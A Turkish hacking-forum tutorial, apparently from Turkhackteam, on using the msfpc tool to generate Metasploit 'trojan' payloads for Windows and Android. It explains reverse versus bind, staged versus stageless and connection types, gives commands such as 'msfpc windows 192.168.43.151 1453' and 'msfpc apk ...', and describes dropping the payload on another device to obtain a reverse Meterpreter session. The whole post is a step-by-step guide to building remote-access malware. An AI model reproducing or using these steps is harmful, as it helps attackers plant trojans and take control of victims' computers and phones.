MSF Serisi #3 Msfpc

AdaletinKILICI

Turan Ordusu
29 Eyl 2019
311
119
127.0.0.1
Selamın aleyküm arkadaşlar. Ben AdaletinKILICI. Bu yazımızda sizlerle beraber msfpc aracının ne olduğuna ve nasıl kullanıldığına değineceğiz. İsterseniz hemen başlayalım. Serinin önceki yazılarına ulaşmak için;

1- MSF Serisi #1 M3tâsploit
2- MSF Serisi #2 Msfcli gibi Msfconsole

linklerini kullanabilirsiniz. Şimdi konumuza geçelim.

Msfpc Nedir?

Msfpc aracını kısaca msfvenom aracının kolaylaştırılmış hali olarak tanımlayabiliriz. Peki msfvenom aracı nedir diyeceksiniz:) Msfvenom aracı çeşitli platformlar için trojanlar oluşturmamıza yarayan bir araçtır. Bu serinin sonraki yazılarında da onun için bir yazı gelecek:)

Msfpc aracı sayesinde neredeyse hiç uğraşmadan payloadlar sayesinde trojan oluşturabilir ve onu dinlemeye alabiliriz. Şimdi isterseniz çeşitli platformlar için nasıl trojan oluşturulduğuna ve bunun nasıl kullanıldığına bakalım.

Msfpc Temel Kullanım

Terminale

Kod:
msfpc -h
yazarsak msfpc aracının temel kullanımını görebiliriz.

Hbsfdo.png


Resimde de gördüğünüz gibi birçok platform için trojan oluşturmayı desteklemektedir. Temel kullanımına gelirsek;

Kod:
 msfpc <TYPE> <IP> <PORT> <DİĞER AYARLAR>
Port değerini girmezsek manuel olarak 443. portu ayarlayacaktır. IP girmezsek de bizden bir ağ kartı seçmemizi isteyecektir. İsterseniz deneyelim.

Hbs7vH.png


Ben burada wlan0'yu seçeceğim. Çünkü wifi ağıma bağlı diğer bir cihaz üzerinde trojan denemesi yapacağım. Sizin de gördüğünüz gibi ip girmediğimiz için böyle bir seçim ekranı geldi. Şimdi de ip girerek deneyelim. Burada unutmamanız gereken şey gireceğiniz ip'nin hedef ip değil kendi ip'niz olmasıdır.

HbBksI.png


Evet gördüğünüz gibi ip sormadı ama portu 443. port olarak otomatik girdi. Bunu engellemek için de ip yanına port yazıyoruz.

HbBRVG.png


Temel olarak kullanımı öğrendik. Şimdi de diğer ayarları ve anlamlarını öğrenelim.

Diğer ayarlara bakacak olursak şöyle sıralayabiliriz.

Kod:
<CMD/MSF> <BIND/REVERSE> <STAGED/STAGELESS> <TCP/HTTP/HTTPS/FIND_PORT> <BATCH/LOOP> <VERBOSE>
CMD: Shell oturumu açmamızı sağlar.
MSF: Meterpreter oturumu oluşturur.

Eğer bu değerlerden birini girmezsek otomatik olarak MSF girilecektir.


BIND: Sisteme bind bağlantı yapmayı sağlar.
REVERSE: Sistem ile ters bağlantı kurmayı sağlar.

Default değeri reverse'dir.


STAGED: Payloadı parçalara bölerek küçültür. Msfconsole aracına bağlıdır.
STAGELESS: Herhangi bir bağımlılığı yoktur. STAGED'den daha stabildir.

Default değeri STAGED'dir


TCP/HTTP/HTTPS/FIND_PORT: Bağlantı türünü seçmemize yarar.

Default değeri TCP'dir.


BATCH: Olası bütün payloadları oluşturur. Yani HTTP için ayrı TCP için ayrı...
LOOP sadece belirtilen tür için payload oluşturur.

Default olarak LOOP'tur.


VERBOSE: Payload oluşturulurken daha fazla bilgi getirir.

Default olarak etkin değildir.


Şimdi bu ayarları da öğrendikten sonra sizlerle beraber birkaç platform için uygulama yapalım.


Windows Örnek Uygulama

İlk olarak kullanımını öğrendiğimiz şekilde default ayarlarda bir payload oluşturalım.

Kod:
 msfpc windows 192.168.43.151 1453
Daha sonra resimde de gördüğünüz gibi bu payloadı dinlemeye almak için bize bir komut verdi. Bu komutu terminalde çalıştıralım.

HbBnUb.png


Eğer resimde gördüğünüz gibi bir hata ile karşılaşırsanız o dosyayı açın ve "run -j" kısmındaki -j parametresini silin. Böylelikle çalışacaktır.

HbBJds.png


Şimdi payloadımızı karşı bilgisayara atıyoruz ve çalıştırıyoruz.

HbBTnP.png


Artık meterpreter oturumuna sahibiz:)

Android Örnek Uygulama

Şimdi de

Kod:
 msfpc apk 192.168.43.151 1453
komutunu kullanarak bir android payload oluşturuyoruz.

HbBHd0.png


Daha sonra dinlemeye alırken hata almamak için "run -j" deki -j parametresini siliyoruz. Ve verilen komutu çalıştırıyoruz.

HbBNYv.png


Telefon üzerinden programı çalıştırdığımızda ise

HbBj96.png


oturumu elde ettiğimizi görürüz:)

Bitiş

Evet arkadaşlar bugünki konumuz da bu kadardı. Temel olarak msfpc aracının kullanımını öğrendiyseniz diğer platformlar için de payloadlar üretip kullanabilirsiniz. Bi sonraki yazımızda görüşmek üzere. Sağlıcakla kalın...
 
Son düzenleme:

ѕeleɴια

Kıdemli Üye
18 May 2018
2,620
904
ZYZZ
Elinize sağlık, Midsec 0 dan 100 e met@sploit develloper ı olmak serisine göz atmanızı tavsiye ederim :))
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.